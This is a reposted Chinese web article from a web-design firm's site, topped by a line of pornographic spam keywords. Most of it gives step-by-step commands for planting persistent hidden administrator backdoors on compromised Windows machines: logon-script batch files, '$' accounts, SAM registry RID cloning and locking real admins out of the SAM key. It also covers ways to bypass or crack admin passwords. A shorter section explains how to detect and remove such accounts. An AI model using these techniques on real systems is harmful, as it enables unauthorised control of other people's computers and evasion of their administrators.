色噜噜久久综合伊人超碰,欧美黄色小说,人人妻人人澡人人爽欧美一区久久,日韩精品国产一区二区在线看

企業(yè)與個(gè)人網(wǎng)絡(luò)營銷一站式服務(wù)商
網(wǎng)站建設(shè) / SEO優(yōu)化排名 / 小程序開發(fā) / OA
0731-88571521
136-3748-2004
服務(wù)器添加隱藏賬號(hào)和檢查刪除隱藏賬號(hào)的方法
信息來源:斌網(wǎng)網(wǎng)絡(luò)   發(fā)布時(shí)間:2010-6-25   瀏覽:

  一.建立一個(gè)別人永遠(yuǎn)刪不掉的管理員用戶

  操作步驟:

  1、在自己電腦里面建立一個(gè).txt文本文件.

  2、在里面輸入內(nèi)容

  @echo off

  net user yixiao 123456 /add 注釋:前面yixiao是用戶名后面123456是密碼;

  net localgroup administrators yixiao /add

  3、把這個(gè)文件保存,更改后綴為yixiao.bat 注釋:前面名字隨便,后面格式一定要是bat;

  4、把這個(gè)文件拷貝到對(duì)方電腦C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目錄下,沒有的話自己創(chuàng)建。

  完成,下次對(duì)方電腦無論如何都有這個(gè)管理員帳號(hào),刪除了,下次啟動(dòng)還有!

  如果把里面的內(nèi)容改成

  @echo off

  net user administrator 123456 /add

  意思是不管你怎么改,下次啟動(dòng)管理員帳號(hào)administrator密碼一直是123456。

  二.俺認(rèn)為上述的方法并不理想,可以用隱藏帳號(hào)方法來建帳號(hào)會(huì)更好 。

  操作步驟:

  1、首先建立一個(gè)帳號(hào)結(jié)尾要帶$號(hào) ,如果yixiao$ , 密碼自己隨便,然后把帳號(hào)刪除.

  2、將以下代碼保存成(.reg)注冊(cè)表形式

  代碼如下:

  -------------------------------------------------------------------------------

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\

  names\yixiao$]

  @=hex(1f4):

  -------------------------------------------------------------------------------

  說明:1f4是Administrator帳號(hào)十六進(jìn)制的值

  3、保存好后導(dǎo)入 ,然后用CMD命令設(shè)置密碼

  net user yixiao$ 123456

  這樣一個(gè)隱形帳號(hào)就建立好了,用戶在“本地用戶和組”內(nèi)根本無法看到這個(gè)帳號(hào)。所以也不存在刪除帳號(hào)。記得千萬別在同事的電腦上搗鼓哦,如果被查出來。。。。。嘿嘿:-)

  隱藏管理員帳號(hào)三分鐘搞定

  對(duì) regedit.exe我想大家都很熟悉,但卻不能對(duì)注冊(cè)表的項(xiàng)鍵設(shè)置權(quán)限,而regedt32.exe最大的優(yōu)點(diǎn)就是能夠?qū)ψ?cè)表的項(xiàng)鍵設(shè)置權(quán)限。 nt/2000/xp的帳戶信息都在注冊(cè)表的HKEY_LOCAL_MACHINE\\SAM\\SAM鍵下,但是除了系統(tǒng)用戶SYSTEM外,其它用戶 都無權(quán)查看到里面的信息,因此我首先用regedt32.exe對(duì)SAM鍵為我設(shè)置為“完全控制”權(quán)限。這樣就可以對(duì)SAM鍵內(nèi)的信息進(jìn)行讀寫了了。具體 步聚如下:

  1、假設(shè)我們是以超級(jí)用戶administrator登錄到開有終端服務(wù)的肉雞上的,首先在命令行下或帳戶管理器中建立一個(gè)帳戶:hacker$,這里我在命令行下建立這個(gè)帳戶 net user hacker$ 1234 /add

  2、在開始/運(yùn)行中輸入:regedt32.exe并回車來運(yùn)行regedt32.exe。

  3、點(diǎn)“權(quán)限”以后會(huì)彈出窗口點(diǎn)添加將我登錄時(shí)的帳戶添加到安全欄內(nèi),這里我是以administrator的身份登錄的,所以我就將 administrator加入,并設(shè)置權(quán)限為“完全控制"。這里需要說明一下:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將 會(huì)帶來一系列不必要的問題。等隱藏超級(jí)用戶建好以,再來這里將你添加的帳戶刪除即可。

  4、再點(diǎn)“開始”→“運(yùn)行”并輸 入"regedit.exe" 回車,啟動(dòng)注冊(cè)表編輯器regedit.exe。 打開鍵:HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names \\hacker$"

  5、將項(xiàng)hacker$、00000409、000001F4導(dǎo)出為hacker.reg、409.reg、 1f4.reg,用記事本分別打這幾個(gè)導(dǎo)出的文件進(jìn)行編輯,將超級(jí)用戶對(duì)應(yīng)的項(xiàng)000001F4下的鍵"F"的值復(fù)制,并覆蓋hacker$對(duì)應(yīng)的項(xiàng) 00000409下的鍵"F"的值,然后再將00000409.reg與hacker.reg合并。

  6、在命令行下執(zhí)行net user hacker$ /del將用戶hacker$刪除:net user hacker$ /del

  7、在regedit.exe的窗口內(nèi)按F5刷新,然后打文件-導(dǎo)入注冊(cè)表文件將修改好的hacker.reg導(dǎo)入注冊(cè)表即可

  8、到此,隱藏的超級(jí)用戶hacker$已經(jīng)建好了,然后關(guān)閉regedit.exe。在regedt32.exe窗口內(nèi)把HKEY_LOCAL_MACHINE\\SAM\\SAM鍵權(quán)限改回原來的樣子(只要?jiǎng)h除添加的帳戶administrator即可)。

  9、注意:隱藏的超級(jí)用戶建好后,在帳戶管理器看不到hacker$這個(gè)用戶,在命令行用“net user”命令也看不到,但是超級(jí)用戶建立以后,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那么在帳戶管理器中將又會(huì)看這個(gè)隱藏的超級(jí)用戶了,而且不能刪除。

  建立與刪除隱藏的管理員帳號(hào)

  當(dāng)黑客入侵一臺(tái)主機(jī)后,會(huì)想方設(shè)法保護(hù)自己的“勞動(dòng)成果”,因此會(huì)在肉雞上留下種種后門來長時(shí)間得控制肉雞,其中使用最多的就是賬戶隱藏技術(shù)。在肉雞上 建立一個(gè)隱藏的賬戶,以備需要的時(shí)候使用。賬戶隱藏技術(shù)可謂是最隱蔽的后門,一般用戶很難發(fā)現(xiàn)系統(tǒng)中隱藏賬戶的存在,因此危害性很大,本文就對(duì)隱藏賬戶這 種黑客常用的技術(shù)進(jìn)行揭密。

  在隱藏系統(tǒng)賬戶之前,我們有必要先來了解一下如何才能查看系統(tǒng)中已經(jīng)存在的賬戶。在系統(tǒng)中可以進(jìn)入“命令 提示符”,控制面板的“計(jì)算機(jī)管理”,“注冊(cè)表”中對(duì)存在的賬戶進(jìn)行查看,而管理員一般只在“命令提示符”和“計(jì)算機(jī)管理”中檢查是否有異常,因此如何讓 系統(tǒng)賬戶在這兩者中隱藏將是本文的重點(diǎn)。

  一、“命令提示符”中的陰謀

  其實(shí),制作系統(tǒng)隱藏賬戶并不是十分高深的技術(shù),利用我們平時(shí)經(jīng)常用到的“命令提示符”就可以制作一個(gè)簡單的隱藏賬戶。

  點(diǎn)擊“開始”→“運(yùn)行”,輸入“CMD”運(yùn)行“命令提示符”,輸入“net user piao$ 123456 /add”,回車,成功后會(huì)顯示“命令成功完成”。接著輸入“net localgroup administrators piao$ /add”回車,這樣我們就利用“命令提示符”成功得建立了一個(gè)用戶名為“piao$”,密碼為“123456”的簡單“隱藏賬戶”,并且把該隱藏賬戶提 升為了管理員權(quán)限。

  我們來看看隱藏賬戶的建立是否成功。在“命令提示符”中輸入查看系統(tǒng)賬戶的命令“net user”,回車后會(huì)顯示當(dāng)前系統(tǒng)中存在的賬戶。從返回的結(jié)果中我們可以看到剛才我們建立的“piao$”這個(gè)賬戶并不存在。接著讓我們進(jìn)入控制面板的“ 管理工具”,打開其中的“計(jì)算機(jī)”,查看其中的“本地用戶和組”,在“用戶”一項(xiàng)中,我們建立的隱藏賬戶“piao$”暴露無疑。

  可以總結(jié)得出的結(jié)論是:這種方法只能將賬戶在“命令提示符”中進(jìn)行隱藏,而對(duì)于“計(jì)算機(jī)管理”則無能為力。因此這種隱藏賬戶的方法并不是很實(shí)用,只對(duì)那些粗心的管理員有效,是一種入門級(jí)的系統(tǒng)賬戶隱藏技術(shù)。

  二、在“注冊(cè)表”中玩轉(zhuǎn)賬戶隱藏

  從上文中我們可以看到用命令提示符隱藏賬戶的方法缺點(diǎn)很明顯,很容易暴露自己。那么有沒有可以在“命令提示符”和“計(jì)算機(jī)管理”中同時(shí)隱藏賬戶的技術(shù)呢?答案是肯定的,而這一切只需要我們?cè)凇白?cè)表”中進(jìn)行一番小小的設(shè)置,就可以讓系統(tǒng)賬戶在兩者中完全蒸發(fā)。

  1、峰回路轉(zhuǎn),給管理員注冊(cè)表操作權(quán)限

  在注冊(cè)表中對(duì)系統(tǒng)賬戶的鍵值進(jìn)行操作,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”處進(jìn)行修改,但是當(dāng)我們來到該處時(shí),會(huì)發(fā)現(xiàn)無法 展開該處所在的鍵值。這是因?yàn)橄到y(tǒng)默認(rèn)對(duì)系統(tǒng)管理員給予“寫入DAC”和“讀取控制”權(quán)限,沒有給予修改權(quán)限,因此我們沒有辦法對(duì)“SAM”項(xiàng)下的鍵值進(jìn) 行查看和修改。不過我們可以借助系統(tǒng)中另一個(gè)“注冊(cè)表編輯器”給管理員賦予修改權(quán)限。

  點(diǎn)擊“開始”→“運(yùn)行”,輸入 “regedt32.exe”后回車,隨后會(huì)彈出另一個(gè)“注冊(cè)表編輯器”,和我們平時(shí)使用的“注冊(cè)表編輯器”不同的是它可以修改系統(tǒng)賬戶操作注冊(cè)表時(shí)的權(quán) 限(為便于理解,以下簡稱regedt32.exe)。在regedt32.exe中來到“HKEY_LOCAL_MACHINE\SAM\SAM”處, 點(diǎn)擊“安全”菜單→“權(quán)限”,在彈出的“SAM的權(quán)限”編輯窗口中選中“administrators”賬戶,在下方的權(quán)限設(shè)置處勾選“完全控制”,完成 后點(diǎn)擊“確定”即可。然后我們切換回“注冊(cè)表編輯器”,可以發(fā)現(xiàn)“HKEY_LOCAL_MACHINE\SAM\SAM”下面的鍵值都可以展開了。

  提示:上文中提到的方法只適用于Windows NT/2000系統(tǒng)。在Windows XP系統(tǒng)中,對(duì)于權(quán)限的操作可以直接在注冊(cè)表中進(jìn)行,方法為選中需要設(shè)置權(quán)限的項(xiàng),點(diǎn)擊右鍵,選擇“權(quán)限”即可。

  2、偷梁換柱,將隱藏賬戶替換為管理員

  成功得到注冊(cè)表操作權(quán)限后,我們就可以正式開始隱藏賬戶的制作了。來到注冊(cè)表編輯器的“HKEY_LOCAL_MACHINE\SAM\SAM \Domains\Account\Users\Names”處,當(dāng)前系統(tǒng)中所有存在的賬戶都會(huì)在這里顯示,當(dāng)然包括我們的隱藏賬戶。點(diǎn)擊我們的隱藏賬戶 “piao$”,在右邊顯示的鍵值中的“類型”一項(xiàng)顯示為0x3e9,向上來到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains \Account\Users\”處,可以找到“000003E9”這一項(xiàng),這兩者是相互對(duì)應(yīng)的,隱藏賬戶“piao$”的所有信息都在 “000003E9”這一項(xiàng)中。同樣的,我們可以找到“administrator”賬戶所對(duì)應(yīng)的項(xiàng)為“000001F4”。

  將 “piao$”的鍵值導(dǎo)出為piao$.reg,同時(shí)將“000003E9”和“000001F4”項(xiàng)的F鍵值分別導(dǎo)出為 user.reg,admin.reg。用“記事本”打開admin.reg,將其中“F”值后面的內(nèi)容復(fù)制下來,替換user.reg中的“F”值內(nèi) 容,完成后保存。接下來進(jìn)入“命令提示符”,輸入“net user piao$ /del”將我們建立的隱藏賬戶刪除。最后,將piao$.reg和user.reg導(dǎo)入注冊(cè)表,至此,隱藏賬戶制作完成。

  3、過河拆橋,切斷刪除隱藏賬戶的途徑

  雖然我們的隱藏賬戶已經(jīng)在“命令提示符”和“計(jì)算機(jī)管理”中隱藏了,但是有經(jīng)驗(yàn)的系統(tǒng)管理員仍可能通過注冊(cè)表編輯器刪除我們的隱藏賬戶,那么如何才能讓我們的隱藏賬戶堅(jiān)如磐石呢?

  打開“regedt32.exe”,來到“HKEY_LOCAL_MACHINE\SAM\SAM”處,設(shè)置“SAM”項(xiàng)的權(quán)限,將 “administrators”所擁有的權(quán)限全部取消即可。當(dāng)真正的管理員想對(duì)“HKEY_LOCAL_MACHINE\SAM\SAM”下面的項(xiàng)進(jìn)行 操作的時(shí)候?qū)?huì)發(fā)生錯(cuò)誤,而且無法通過“regedt32.exe”再次賦予權(quán)限。這樣沒有經(jīng)驗(yàn)的管理員即使發(fā)現(xiàn)了系統(tǒng)中的隱藏賬戶,也是無可奈何的。

  三.專用工具,使賬戶隱藏一步到位

  雖然按照上面的方法可以很好得隱藏賬戶,但是操作顯得比較麻煩,并不適合新手,而且對(duì)注冊(cè)表進(jìn)行操作危險(xiǎn)性太高,很容易造成系統(tǒng)崩潰。因此我們可以借助專門的賬戶隱藏工具來進(jìn)行隱藏工作,使隱藏賬戶不再困難,只需要一個(gè)命令就可以搞定。

  我們需要利用的這款工具名叫“HideAdmin”,下載下來后解壓到c盤。然后運(yùn)行“命令提示符”,輸入“HideAdmin piao$ 123456”即可,如果顯示“Create a hiden Administrator piao$ Successed!”,則表示我們已經(jīng)成功建立一個(gè)賬戶名為piao$,密碼為123456的隱藏賬戶。利用這款工具建立的賬戶隱藏效果和上文中修改注 冊(cè)表的效果是一樣的。

  四、把“隱藏賬戶”請(qǐng)出系統(tǒng)

  隱藏賬戶的危害可謂十分巨大。因此我們有必要在了解了賬戶隱藏技術(shù)后,再對(duì)相應(yīng)的防范技術(shù)作一個(gè)了解,把隱藏賬戶徹底請(qǐng)出系統(tǒng)。

  1、添加“$”符號(hào)型隱藏賬戶

  對(duì)于這類隱藏賬戶的檢測比較簡單。一般黑客在利用這種方法建立完隱藏賬戶后,會(huì)把隱藏賬戶提升為管理員權(quán)限。那么我們只需要在“命令提示符”中輸入 “net localgroup administrators”就可以讓所有的隱藏賬戶現(xiàn)形。如果嫌麻煩,可以直接打開“計(jì)算機(jī)管理”進(jìn)行查看,添加“$”符號(hào)的賬戶是無法在這里隱藏 的。

  2、修改注冊(cè)表型隱藏賬戶

  由于使用這種方法隱藏的賬戶是不會(huì)在“命令提示符”和“計(jì)算機(jī)管理”中看到的,因此可以到 注冊(cè)表中刪除隱藏賬戶。來到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”,把這 里存在的賬戶和“計(jì)算機(jī)管理”中存在的賬戶進(jìn)行比較,多出來的賬戶就是隱藏賬戶了。想要?jiǎng)h除它也很簡單,直接刪除以隱藏賬戶命名的項(xiàng)即可。

  3、無法看到名稱的隱藏賬戶

  如果黑客制作了一個(gè)修改注冊(cè)表型隱藏賬戶,在此基礎(chǔ)上刪除了管理員對(duì)注冊(cè)表的操作權(quán)限。那么管理員是無法通過注冊(cè)表刪除隱藏賬戶的,甚至無法知道黑客建 立的隱藏賬戶名稱。不過世事沒有絕對(duì),我們可以借助“組策略”的幫助,讓黑客無法通過隱藏賬戶登陸。點(diǎn)擊“開始”→“運(yùn)行”,輸入 “gpedit.msc”運(yùn)行“組策略”,依次展開“計(jì)算機(jī)配置”→“Windows 設(shè)置”→“安全設(shè)置”→“本地策略”→“審核策略”,雙擊右邊的“審核策略更改”,在彈出的設(shè)置窗口中勾選“成功”,然后點(diǎn)“確定”。對(duì)“審核登陸事件” 和“審核過程追蹤”進(jìn)行相同的設(shè)置。

  進(jìn)行登陸審核后,可以對(duì)任何賬戶的登陸操作進(jìn)行記錄,包括隱藏賬戶,這樣我們就可以通過“計(jì)算機(jī)管理”中 的“事件查看器”準(zhǔn)確得知隱藏賬戶的名稱,甚至黑客登陸的時(shí)間。即使黑客將所有的登陸日志刪除,系統(tǒng)還會(huì)記錄是哪個(gè)賬戶刪除了系統(tǒng)日志,這樣黑客的隱藏賬 戶就暴露無疑了。

  得知隱藏賬戶的名稱后就好辦了,但是我們?nèi)匀徊荒軇h除這個(gè)隱藏賬戶,因?yàn)槲覀儧]有權(quán)限。但是我們可以在“命令提示符”中輸入“net user 隱藏賬戶名稱 654321”更改這個(gè)隱藏賬戶的密碼。這樣這個(gè)隱藏賬戶就會(huì)失效,黑客無法再用這個(gè)隱藏賬戶登陸。

  win2003下創(chuàng)建永遠(yuǎn)的隱藏帳戶操作一、二

  前段時(shí)間比較流行的一句話”肉機(jī)”其實(shí)要想控制遠(yuǎn)端的計(jì)算機(jī),那我想就少不了隱藏用戶帳號(hào)的問題了,其實(shí)創(chuàng)建隱藏用戶帳號(hào)還是比較簡單的,現(xiàn)在我就把創(chuàng)建隱藏用戶帳號(hào)告訴大家。

  其實(shí)每一個(gè)用戶帳號(hào)在注冊(cè)表中都有自己帳號(hào)數(shù)據(jù)項(xiàng)

  首先我們看看管理員在注冊(cè)表中的數(shù)據(jù)項(xiàng)是什么樣的

  操作一、打開注冊(cè)表:HKEY_LOCAL_MACHINE\SAM\SAM

  SAM是保存用戶帳號(hào)的地方,不過這個(gè)“項(xiàng)”在默認(rèn)情況下是不可見的。我們?nèi)绻肟磧?nèi)部的內(nèi)容就必須首先對(duì)其授權(quán)。(建議對(duì)注冊(cè)表不是很熟悉的朋友不要隨便改動(dòng)注冊(cè)表)

  操作二、認(rèn)識(shí)注冊(cè)表中的帳號(hào)分類

  在OS中的用戶帳號(hào)無論是內(nèi)置帳號(hào),還是后建帳號(hào),在注冊(cè)表中都能看見。不過有兩個(gè)帳號(hào)大家一定要能夠認(rèn)識(shí),那就是管理員帳號(hào)和guest帳號(hào)。

  ”000001fa4”表示的是管理員帳號(hào),即使管理員帳號(hào)被重命名了這個(gè)值也是不會(huì)變的,所以我們可以通過這個(gè)值來判斷,重命名后的管理員帳號(hào)。

  “000001fa5” 表示的是guest帳號(hào),同樣這個(gè)值也不會(huì)因?yàn),來賓帳號(hào)給重命名而改變。剩下的其 它值基本上就是后來創(chuàng)建的用戶帳號(hào),生成值了。 認(rèn)識(shí)了注冊(cè)表后,現(xiàn)在我們就來利用”net user”命令創(chuàng)建帳號(hào)了,創(chuàng)建隱藏帳號(hào)必須在CMD下。有關(guān)常見的命令,這些命令也可以在OS的幫助中找到。

  操作三、利用”net user”命令創(chuàng)建帳號(hào)

  一、先建立隱藏用戶 xbx$ 1、net user xbx$ 123,abc /add 這里的意思是說,建立個(gè)xbx$ 帳戶密碼是123,abc

  1、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 這里的意思是說把xbx,以便讓我們創(chuàng)建用戶具備管理員權(quán)限。

  一、觀察注冊(cè)表中的變化,并對(duì)注冊(cè)表做相應(yīng)的修改。 HKEY_LOCAL_MACHINE\SAM\SAM

  1、找到我們剛剛創(chuàng)建的用戶帳號(hào)

  我們可以看見”000003f6”就是我們剛新建立的”xbx

  2、在注冊(cè)表中多帳號(hào)權(quán)限復(fù)制

  找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 這個(gè)項(xiàng),打開”000001f4”項(xiàng),然后再打開”F”。

  然后將這里面的值,全選,粘帖并覆蓋到”000003f6”的”F”值.

  3、導(dǎo)出注冊(cè)表值

  現(xiàn)在將注冊(cè)表中的“000001f4”、“000003f6”和“xbx"都導(dǎo)入出來,可直接將Users所有鍵值都導(dǎo)出來,到文件.

  4、刪除帳號(hào)

  接下來我們?cè)俅芜M(jìn)入“CMD”中刪除“xbx

  刪除帳號(hào)后,則注冊(cè)表中的值也就沒有了,這個(gè)時(shí)候我們?cè)侔褎偛艑?dǎo)出的注冊(cè)表項(xiàng),導(dǎo)入到注冊(cè)表中。 這個(gè)時(shí)候我們打開“本地計(jì)算機(jī)用戶和組”就看不見“xbx"

  系統(tǒng)密碼破解方法總結(jié)

  一、ERD2003

  利用ERD2003強(qiáng)行修改系統(tǒng)管理員密碼的方法簡單、易于操作,且對(duì)2000/xp/2003系統(tǒng)均有效。下面就具體介紹一下這個(gè)軟件的用法。

  1.下載ERD2003的iso,刻錄成可啟動(dòng)的CD,注意別搞錯(cuò)了,直接刻錄鏡像最好。

  2.設(shè)置系統(tǒng)從光盤啟動(dòng),進(jìn)入“系統(tǒng)”后,ERD2003會(huì)針對(duì)系統(tǒng)的網(wǎng)絡(luò)等硬件設(shè)備進(jìn)行一些設(shè)置,總之遇到要你選擇時(shí)一概選“yes”即可。

  3.接下來ERD2003會(huì)在你的硬盤里搜索所有已安裝的系統(tǒng),再讓你選擇要修改的系統(tǒng)。

  4.耐心等待,進(jìn)入系統(tǒng)后:按start—administrative tools—locksmith,進(jìn)入強(qiáng)行修改密碼的界面,隨后彈出的對(duì)話框會(huì)讓你選擇要修改密碼的用戶名,選擇后即可強(qiáng)行修改密碼而不用輸入原始密碼,然后點(diǎn)擊NEXT,之后重啟。

  二、PASSWARE KIT 5.0中的Windows KEY 5.0

  也有一些工具光盤里有這個(gè)程序,直接光盤運(yùn)行就可以了。

  如果找不到這種光盤,運(yùn)行PASSWARE KIT 5.0后生成3個(gè)文件:TXTSETUP.OEM、WINKEY.SYS和WINKEY.INF,3個(gè)文件共50KB。

  把這3個(gè)文件放在任何軟盤中,然后使用XP安裝光盤啟動(dòng)電腦,啟動(dòng)過程中按F6鍵讓系統(tǒng)采用第三方驅(qū)動(dòng)程序。

  此時(shí),正是我們切入的最好時(shí)機(jī),放入該軟盤就會(huì)自動(dòng)跳到Windows KEY的界面。軟件會(huì)自動(dòng)檢測系統(tǒng)中安裝的Windows 2000/XP/2003并列一個(gè)表供用戶選擇,當(dāng)出現(xiàn)提示“Please enter your selection 1..? or 0 to quit:”(根據(jù)檢測到已安裝操作系統(tǒng)的數(shù)量,“?”可能是1到9之間的某個(gè)數(shù)字)時(shí),按相應(yīng)的數(shù)字鍵進(jìn)行選擇。接著出現(xiàn)提示“Set local Administrator password to‘12345’?(Y/N):”,即問是否把“Administrator”的密碼修改為“12345”,按Y鍵,軟件首先自動(dòng)備份原密碼,然后把 “Administrator”的密碼修改為“12345”。從光驅(qū)中取出光盤,重新啟動(dòng)計(jì)算機(jī),如果Windows XP歡迎界面中沒有列出“Administrator”用戶,那么就連續(xù)按兩次“Ctrl+Alt+Del”組合鍵,這時(shí)就會(huì)出現(xiàn)輸入用戶名和密碼的界 面,在“用戶名”中輸入“Administrator”,在“密碼”中輸入“12345”,單擊“確定”按鈕就可以登錄Windows XP了。

  提示:第一次登錄Windows XP,系統(tǒng)會(huì)提示你密碼已到期,要不要進(jìn)行修改。你可以根據(jù)需要自行選擇。

  這 個(gè)方法還可以恢復(fù)原來的密碼 !!如果只是臨時(shí)使用系統(tǒng),使用完Windows XP后還想恢復(fù)原來的“Administrator”的密碼,可按下面的方法操作。 先按照修改“Administrator”密碼的步驟一和步驟二進(jìn)行操作,接著就會(huì)出現(xiàn)提示“Would you like to undo Windows XP/2000/NT Key changes?(Y/N):”,按Y鍵,軟件就會(huì)自動(dòng)恢復(fù)原來的“Administrator”密碼,接著又出現(xiàn)提示“Set local Administrator password to ‘12345’?(Y/N):”,按N鍵,不要把“Administrator”的密碼修改為“12345”。從光驅(qū)中取出光盤,重新啟動(dòng)計(jì)算機(jī),就完成 了密碼恢復(fù)。

  三、DreamPackPL

  將下載回來的軟件DreamPackPL解壓縮到硬盤上一個(gè)方便的位置,然后運(yùn) 行其中的DreamPack.exe文件,在軟件界面上選中放入Windows安裝光盤的光驅(qū),然后點(diǎn)擊“Make ISO CD image”按鈕,程序?qū)?chuàng)建一個(gè)ISO格式的光盤鏡像,并需要你指定保存該鏡像文件的目錄。創(chuàng)建好后用光盤刻錄軟件將該鏡像文件刻錄到光盤中,然后使用 這張光盤引導(dǎo)電腦啟動(dòng)。Windows的安裝程序?qū)?huì)自動(dòng)運(yùn)行,到某時(shí)按R鍵進(jìn)入故障恢復(fù)控制臺(tái)。隨后安裝程序會(huì)自動(dòng)顯示所有已經(jīng)安裝的Windows操 作系統(tǒng),使用數(shù)字鍵選擇你想要進(jìn)入的操作系統(tǒng)的故障恢復(fù)控制臺(tái),然后按下回車。當(dāng)需要輸入管理員密碼的時(shí)候也不用擔(dān)心,我們并不知道密碼是什么,但是我們 要只要,直接按下回車就可以跳過這一步。隨后進(jìn)入System32文件夾:cd system32,并把該目錄下的文件sfcfiles.dll重命名為其他名稱:ren sfcfiles.dll sfcfiles.lld。接著我們從光盤中I386目錄下復(fù)制文件pinball.ex_到System32文件夾中,并命名為 sfcfiles.dll:copy d:\i386\ pinball.ex_ sfcfiles.dll。至此前期工作已經(jīng)全部做完了,把光盤拿出來,然后輸入exit命令退出控制臺(tái),并重啟動(dòng)電腦。以上所作的一切只是為了替換系統(tǒng) 中的sfcfiles.dll文件,因此如果你的操作系統(tǒng)安裝在FAT32文件系統(tǒng)的分區(qū)上,那就更簡單了,只要直接用Windows 98啟動(dòng)盤引導(dǎo)電腦進(jìn)入DOS,并在DOS下用DreamPackPL軟件壓縮包中的sfcfiles.dll文件替換System32目錄下的原同名文 件即可(注意不要忘了Windows的文件保護(hù),備份文件也要替換)。

  忘記了電腦中管理員帳戶的密碼。那么可以在重啟后顯示的界面上點(diǎn)擊“Details”按鈕,隨后可以看到和平常的帳戶管理界面類似界面,選中想要修改密碼的帳戶,然后點(diǎn)擊窗口下方的“重設(shè)密碼”按鈕,輸入新的密碼后點(diǎn)擊確定即可。

  四、其他的方法

  1.一個(gè)dos下破解密碼的軟件,DOSPASS。

  2.直接用安裝盤啟動(dòng)安裝界面時(shí)按Shift+F10,打開一個(gè)命令行窗口,用net user administrator 123 修改密碼為123,用SHIFT+F10打開CMD后運(yùn)行SET不加參數(shù)可以看到密碼。

  3. 使用OFFICE NT PASSWORD & REGISTRY EDITOR。用該軟件可以制作LINUX啟動(dòng)盤,這個(gè)啟動(dòng)盤可以訪問NTFS文件系統(tǒng),因此可以很好地支持Windows 2000/XP。使用該軟盤中的一個(gè)運(yùn)行在LINUX下的工具NTPASSWD就可以解決問題,并且可以讀取注冊(cè)表并重寫賬號(hào)。使用方法很簡單,只需根據(jù) 其啟動(dòng)后的提示一步一步做就可以了。在此,建議你使用快速模式,這樣會(huì)列出用戶供你選擇修改那個(gè)用戶密碼。默認(rèn)選擇ADMIN組用戶,自動(dòng)找到把 ADMINISTRATOR的名字換掉的用戶,十分方便。

  五、網(wǎng)上其他一些傳說中破解Windows2000/WindowsXP/Windows2003密碼的方法

  1.進(jìn)入DOS刪除sam文件——這種方法對(duì)win2000有效,對(duì)xp和2003不但無效,還會(huì)導(dǎo)致系統(tǒng)死鎖而徹底無法使用。

  2.用winpe啟動(dòng)進(jìn)控制臺(tái),然后用dos命令手動(dòng)增添用戶——除非原來管理員密碼(指的是安全模式下的那個(gè)管理員)就沒有設(shè)置,否則無效。

  3. 將屏幕保護(hù)改名,將cmd.exe改名為logon.scr(當(dāng)然要掛在別的機(jī)器上改了),開機(jī)后等待10分鐘進(jìn)入屏幕保護(hù),實(shí)際上就進(jìn)入了 dos命令行界面,可以用net命令加用戶——已證明在sp1、sp2、2003中,這樣進(jìn)入dos后的權(quán)限根本不是管理員,因此也無法添加用戶。

  4. 硬盤掛到別的機(jī)器上,考出system32文件夾中的sam文件,用lc4暴力解密——理論上是可以的,打開并新建一個(gè)任務(wù),然后依次擊 “IMPORT→Import from SAM file”,打開已待破解的SAM文件,此時(shí)LC4會(huì)自動(dòng)分析此文件,并顯示出文件中的用戶名;之后點(diǎn)擊“Session→Begin Audit”,即可開始破解密碼。但如果密碼比較復(fù)雜的話,解密時(shí)間會(huì)極其的長。




上一條: asp定時(shí)生成靜態(tài)HTML的代碼
下一條: IIS下ASP目錄漏洞和IIS分號(hào)漏洞(;)的臨時(shí)解決方法 防止asp加分號(hào)上傳jpg文件被當(dāng)成asp運(yùn)行
案例鑒賞
多年的網(wǎng)站建設(shè)經(jīng)驗(yàn),斌網(wǎng)網(wǎng)絡(luò)不斷提升技術(shù)設(shè)計(jì)服務(wù)水平,迎合搜索引擎優(yōu)化規(guī)則
法律法規(guī)
多年的網(wǎng)站建設(shè)經(jīng)驗(yàn),網(wǎng)至普不斷提升技術(shù)設(shè)計(jì)服務(wù)水平,迎合搜索引擎優(yōu)化規(guī)則
長沙私人做網(wǎng)站    長沙做網(wǎng)站    深圳網(wǎng)站建設(shè)    株洲做網(wǎng)站    東莞做網(wǎng)站    南京防腐木    湖南大拇指養(yǎng)豬設(shè)備    株洲做網(wǎng)站    
版權(quán)所有 © 長沙市天心區(qū)斌網(wǎng)網(wǎng)絡(luò)技術(shù)服務(wù)部    湘公網(wǎng)安備 43010302000270號(hào)  統(tǒng)一社會(huì)信用代碼:92430103MA4LAMB24R  網(wǎng)站ICP備案號(hào):湘ICP備13006070號(hào)-2